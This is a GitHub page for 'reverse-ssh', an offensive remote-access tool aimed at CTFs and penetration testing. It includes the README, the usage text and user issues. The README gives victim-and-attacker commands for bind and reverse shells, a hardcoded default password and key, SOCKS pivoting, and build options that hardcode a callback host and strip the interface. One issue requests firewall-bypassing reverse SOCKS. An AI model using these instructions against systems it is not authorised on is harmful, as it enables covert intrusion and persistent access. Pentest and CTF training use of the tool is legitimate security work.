fahrj / reverse-ssh Goto Github PK

Statically-linked ssh server with reverse shell functionality for CTFs and such

License: GNU General Public License v3.0

Makefile 5.72% Go 94.28%

ssh security security-tools hacking penetration-testing penetration-testing-tools reverse-shell golang remote-admin-tool remote-shell

reverse-ssh's Introduction

ReverseSSH

A statically-linked ssh server with a reverse connection feature for simple yet powerful remote access. Most useful during HackTheBox challenges, CTFs or similar.

Has been developed and was extensively used during OSCP exam preparation.

Get the latest Release

Features

Catching a reverse shell with netcat is cool, sure, but who hasn't accidentally closed a reverse shell with a keyboard interrupt due to muscle memory? Besides their fragility, such shells are also often missing convenience features such as fully interactive access, TAB-completion or history.

Instead, you can go the way to simply deploy the lightweight ssh server (<1.5MB) reverse-ssh onto the target, and use additional commodities such as file transfer and port forwarding!

ReverseSSH tries to bridge the gap between initial foothold on a target and full local privilege escalation. Its main strengths are the following:

Fully interactive shell access (check caveats for old windows versions below)
File transfer via sftp
Local / remote / dynamic port forwarding
Can be used as bind- and reverse-shell
Supports Unix and Windows operating systems

Windows caveats

A fully interactive powershell on windows relies on Windows Pseudo Console ConPTY and thus requires at least Win10 Build 17763. On earlier versions you can still get an interactive reverse shell that can't handle virtual terminal codes such as arrow keys or keyboard interrupts. In such cases you have to append the cmd command, i.e. ssh <OPTIONS> <IP> cmd.

You can achieve full interactive shell access for older windows versions by dropping ssh-shellhost.exe from OpenSSH for Windows in the same directory as reverse-ssh and then use flag -s ssh-shellhost.exe. This will pipe all traffic through ssh-shellhost.exe, which mimics a pty and transforms all virtual terminal codes such that windows can understand.

Requirements

Simply executing the provided binaries only relies on golang system requirements.

In short:

Linux: kernel version 2.6.23 and higher
Windows: Windows Server 2008R2 and higher or Windows 7 and higher

Compiling additionally requires the following:

golang version 1.15
optionally upx for compression (e.g. apt install upx-ucl)

Usage

Once reverse-ssh is running on the victim, you can connect with any username and the default password letmeinbrudipls, the ssh key or whatever you specified during compilation. After all, it is just an ssh server:

# Fully interactive shell access
$ ssh -p <RPORT> <RHOST>

# Simple command execution
$ ssh -p <RPORT> <RHOST> whoami

# Full-fledged file transfers
$ sftp -P <RPORT> <RHOST>

# Dynamic port forwarding as SOCKS proxy on port 9050
$ ssh -p <RPORT> -D 9050 <RHOST>

Running ReverseSSH as bind shell

# Victim
victim$ ./reverse-ssh

# Attacker (default password: letmeinbrudipls)
attacker$ ssh -p 31337 <RHOST>

Running ReverseSSH as reverse shell

Note: you can compile ReverseSSH with parameters for LHOST and LPORT to ease execution on the target, see below

# On attacker (get ready to catch the incoming request;
# can be omitted if you already have an ssh daemon running, e.g. OpenSSH)
# NOTE: LPORT of 8888 collides with incoming connections; use the flag `-b 8889` or similar on the victim in that case
attacker$ ./reverse-ssh -v -l -p <LPORT>

# On victim
victim$ ./reverse-ssh -p <LPORT> <LHOST>
# or in case of an ssh daemon listening at port 22 with password authentication for user 'kali'
victim$ ./reverse-ssh -p 22 kali@<LHOST>

# On attacker (default password: letmeinbrudipls)
attacker$ ssh -p 8888 127.0.0.1
# or with ssh config from below
attacker$ ssh target

In the end it's plain ssh, so you could catch the remote port forwarding call coming from the victim's machine with your openssh daemon listening on port 22. Just prepend <USER>@ and provide the password once asked to do so. Dialling home currently is password only, because I didn't feel like baking a private key in there as well yet...

For even more convenience, add the following to your ~/.ssh/config, copy the ssh private key to ~/.ssh/ and simply call ssh target or sftp target afterwards:

Host target
        Hostname 127.0.0.1
        Port 8888
        IdentityFile ~/.ssh/id_reverse-ssh
        IdentitiesOnly yes
        StrictHostKeyChecking no
        UserKnownHostsFile /dev/null

Full usage

reverseSSH v1.2.0  Copyright (C) 2021  Ferdinor <[email protected]>

Usage: reverse-ssh [options] [[<user>@]<target>]

Examples:
  Bind:
        reverse-ssh -l
        reverse-ssh -v -l -p 4444
  Reverse:
        reverse-ssh 192.168.0.1
        reverse-ssh [email protected]
        reverse-ssh -p 31337 192.168.0.1
        reverse-ssh -v -b 0 [email protected]

Options:
        -l, Start reverseSSH in listening mode (overrides reverse scenario)
        -p, Port at which reverseSSH is listening for incoming ssh connections (bind scenario)
                or where it tries to establish a ssh connection (reverse scenario) (default: 31337)
        -b, Reverse scenario only: bind to this port after dialling home (default: 8888)
        -s, Shell to spawn for incoming connections, e.g. /bin/bash; (default: /bin/bash)
                for windows this can only be used to give a path to 'ssh-shellhost.exe' to
                enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory)
        -N, Deny all incoming shell/exec/subsystem and local port forwarding requests
                (if only remote port forwarding is needed, e.g. when catching reverse connections)
        -v, Emit log output

<target>
        Optional target which enables the reverse scenario. Can be prepended with
        <user>@ to authenticate as a different user other than 'reverse' while dialling home

Credentials:
        Accepting all incoming connections from any user with either of the following:
         * Password "letmeinbrudipls"
         * PubKey   "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlbJwr+ueQ0gojy4QWr2sUWcNC/Y9eV9RdY3PLO7Bk/ Brudi"

Build instructions

Make sure to install the above requirements such as golang in a matching version and set it up correctly. Afterwards, you can compile with make, which will create static binaries in bin. Use make compressed to pack the binaries with upx to further reduce their size.

$ make

# or to additionally created binaries packed with upx
$ make compressed

Build tricks

You can also specify one or more of the following environmental variables when compiling to customize ReverseSSH to your use case:

RS_SHELL to change the default shell
RS_PASS to provide your personalized password
RS_PUB to provide your personalized an authorized key
LUSER to change the default username of the ssh connection attempt
LHOST to provide a default LHOST value and make ReverseSSH default to the reverse scenario
LPORT to change the default listening port or port where an ssh connection attempt is sent to
BPORT to change the default listening port of reverse connections on the attacker machine; 0 means any free port is taken
NOCLI with any value removes all user-facing interaction (the binary ignores all supplied flags or arguments)

$ ssh-keygen -t ed25519 -f id_reverse-ssh

$ RS_SHELL="/bin/sh" RS_PASS="secret" RS_PUB="$(cat id_reverse-ssh.pub)" make compressed

$ LHOST="192.168.0.10" LPORT="443" BPORT="0" RS_PUB="$(cat id_reverse-ssh.pub)" make compressed

Building for different operating systems or architectures

By default, reverse-ssh is compiled for your current OS and architecture, as well as for linux and windows in x86 and x64. To compile for other architectures or another OS you can provide environmental variables which match your target, e.g. for linux/arm64:

$ GOARCH=arm64 GOOS=linux make compressed

A list of available targets in format OS/arch can be obtained via go tool dist list.

Contribute

Is a mind-blowing feature missing? Anything not working as intended?

Create an issue or pull request!

reverse-ssh's People

Contributors

Stargazers

Watchers

Forkers

aclisp minkione ocean-redemption amdyes-droid pseudobobsmith pramathu uionto bigttys0 kp-forks bbhunter vcanev flaviupopescu ceyhuncamli killvxk bigbrobro y0d4a erickie007 gh0st0ne isiaon sec-js joe0x04 gavz singletrackseeker shunkt 3m1za4 r0ck3rt 5l1v3r1 tmp63498 way29 hartoyob radys reanimat0r h4xl0r itsignacioportal nobeltnium hackinfinity crisprss go-bi lindainfosec wulongcomputer taofeifeifei shead0n eurekax696 kristophercasey trendingtechnology deville-ee adversaryemulator skywikia uyid 7e4 archivedrive dongtran2596 xroot000 st0pli justinforbes mobshy techthupport fmmarques molusegit anggadaz linpinger yifengchen-cc skrtu f0xmulder bypasscc bolatangkasnet alekseibakush pengtao007 istoliving step855 yalonso7 gaspardle trevor3000 pawnzr nanaao xukgo macweese liuhuan72 shanjunmei cmndcntrlcyber poinine qaison sg1965 wyzmgmdg zhaojjxy pwnfun zwg-zero gg-big-org dxcqs kucaiyi keobjames andrewintw pbelx pwfoo gyorijanos iq-scm ctrelo4ek jainpriyanshu11 alexrf45 yiyi2004

reverse-ssh's Issues

Problem to establish remote connection

Hi,
I try to establish an connection between two hosts with reserse-ssh.

I need to add -v flag to see password prompt
Authenticated by password looks good

2023/04/04 20:18:03 Successful authentication with password from [email protected]:17477
2023/04/04 20:18:03 Attempt to bind at 127.0.0.1:8888 granted

But fails with

Enter password:
2023/04/04 20:18:03 ssh: tcpip-forward request denied by peer

Is it related to hosts sshd? But I tried to connect with reverse-ssh binary to a reverse-ssh listener...

Listener cmd:

./upx_reverse-sshx64 -v -l -p 8888 <IP>

Client cmd:

./upx_reverse-sshx64 -p 8888 -v <IP>

Dial Home with key file

Hi, thanks for making this awesome tools. Would like to use it as a backup ssh on a bare metal that has no remote management interface.

So is there any chance on implementing dial home ssh with support for private key? or any bash trick to read the password from file instead? I'm thinking of starting the command at startup

Can't use dropbear private key file

Tried to use the branch with key auth, but doesn't work with dropbear generated rsa key.
Key seems to be valid with dropbear, but is unparseable for reverse-ssh?

dropbearkey -f /root/.ssh/id_dropbear -y
Public key portion is:
ssh-rsa <KEY> root@<HOST>
Fingerprint: SHA256:<FPRINT>

The ID file isn't a readable file?

Tested with a ssh-keygen generated pair and that seems to work.

But looks like binary uses the password instead of the rsa key...?

2023/04/04 20:53:42 Successful authentication with password from [email protected]:17424
2023/04/04 20:53:42 Attempt to bind at 127.0.0.1:8888 granted

Key file is read without an error. Debug lines say auth by password?
Is there a option to disable password and only use key auth?

Code for SSH Session on Linux without a terminal

https://github.com/Fahrj/reverse-ssh/blob/master/ssh_session_unix.go#L58-L61

This code seems to be forgotten as we did the copy/pasta from the gliderlabs example. What should we do in this case? Error out?

Victim machine keep asking for password

update: So turn out the password will print out when i invoke command .\reverse-ssh.exe -h (a random string).
This can be change to a custom password in the make file before compiling.

read from config file

please add a default config file path so that no args will need to launch the program.

open /dev/pts/0: operation not permitted

Hi，I got this error on victim. Do you have any suggestion?

rsa fingerprint always change when restart

rsa fingerprint always change when reversessh restart. how to make it be static?

Does it support cross-network operation?

I understand the reverse meaning, it should be used to support ssh to the target of the non-current network, usually a relay server is established, exposed to the public network, and the target machine is connected to the relay server, but the document that confuses me is that the victim How does the attacker know about the attacker's machine (server side)

Other Architecture Builds

Maybe you could add some info to the README on how to compile it for other targets as well.
Something like:
"""
To compile for other architectures or OSs just add the desired line to the build target.
E.g. for linux/arm64:

CGO_ENABLED=0 GOARCH=arm64  GOOS=linux  go build -ldflags="$(LDFLAGS) -s -w" -o bin/reverse-ssh-arm64 .

A list of available targets can be obtained via go tool dist list.
"""

Or even allow specific target selection via environment variables or build targets.

Error in documentation ?

About the reverse shell scenario there is the following instruction in the README:

# On attacker (get ready to catch the incoming request;
# can be omitted if you already have an ssh daemon running, e.g. OpenSSH)
# NOTE: LPORT of 8888 collides with incoming connections; use the flag `-b 8889` or similar on the victim in that case
attacker$ ./reverse-ssh -v -l -p <LPORT>

As I understand it, this command is useful if I want to receive a shell from the victim without having a SSH server on my side, right ?

f I try to use it:

$ ./reverse-sshx64 -v -l -p 9999
2021/12/12 15:59:06 Dialling home via ssh to 9999:22
2021/12/12 15:59:06 dial tcp: lookup 9999: no such host

It looks like it is not listening but is trying to connect to another host. Also the LPORT parameter given is the documentation seems to be used as a HOST instead.

It may be an issue in the documentation or it is not clear to me. I already used it in bind mode and it was great, nice tool :)

FeatureRequest: Add -R option for remote SOCKS connection

It would be great to get the -R option from ssh.
-R [bind_address:]port Specifies that connections to the given TCP port or Unix socket on the remote (server) host are to be forwarded to the local side. This works by allocating a socket to listen to either a TCP port or to a Unix socket on the remote side. Whenever a connection is made to this port or Unix socket, the connection is forwarded over the secure channel, and a connection is made from the local machine to either an explicit destination specified by host port hostport, or local_socket, or, if no explicit destination was specified, ssh will act as a SOCKS 4/5 proxy and forward connections to the destinations requested by the remote SOCKS client.

This would allow a reverse SOCKS connection, which can then be used from the attacker system with proxychains to reach systems in the victim network.
And as this would not be a bind shell, it might bypass firewall rules.

Way to close reverse ssh tunnel from server it's connected to

It would be awesome if their was a command that I could use once done with the reverse tunnel to close/exit the remote process running the tunnel; so when I'm done with the tunnel I could exit/stop the tunnel from the server that its connected too, so that i could use the same port for multiple sessions if that makes sense. At the moment to disconnect/exit the connected remote process I'm having to restart the ssh server, which means i lose any other connected clients to the server, is their any way that you could implement some sort of exit command or make an argument so that once the first sh/bash session has exited that it closes the reverse tunnel and exits? Like a one-shot mode or something like that, Hoping the feature request makes sense

No static binaries for arm32 and 64

Would you be able to provide such binaries?

Reverse-ssh keeps asking for the password

Closed

Cannot set BPORT at compilation

Setting BPORT at compilation doesn't affect the final compiled binary.
When setting BPORT=0, it seems to be ignored and I have to manually use the -b 0 option to make it work

HOME not set

[rumpelsepp@alderaan bin]$ cd
bash: cd: HOME not set

I think it might be worth trying to set this variable to some default. A few things break annoyingly when $HOME is not set. The server queries information about the user for the rs-info channel anyway. So, the information about $HOME is already there.

Inconsistency in Readme / Build not working as described

Hello,

I encountered a wierd issue when trying to play around with the tool, specifically when using a binary release vs. building from source.

I download the reverse-sshx64 binary release.
I place it on a computer on my network and start it with ./reverse-sshx64 as described.
I can ssh into it from my host with ssh -p 31337 <IP> and the default password just fine.

When I clone and compile it from b5b9a0d without making any changes on go1.18.5 linux/amd64 and repeat the same steps as described in 2) and 3), I get prompted for a password just the same.

Whatever password I enter (obviously including the default one) I get a permission denied.
It seems to me I must have made a terribly stupid mistake somewhere but I really can't seem to find out where.

best regards and thanks in advance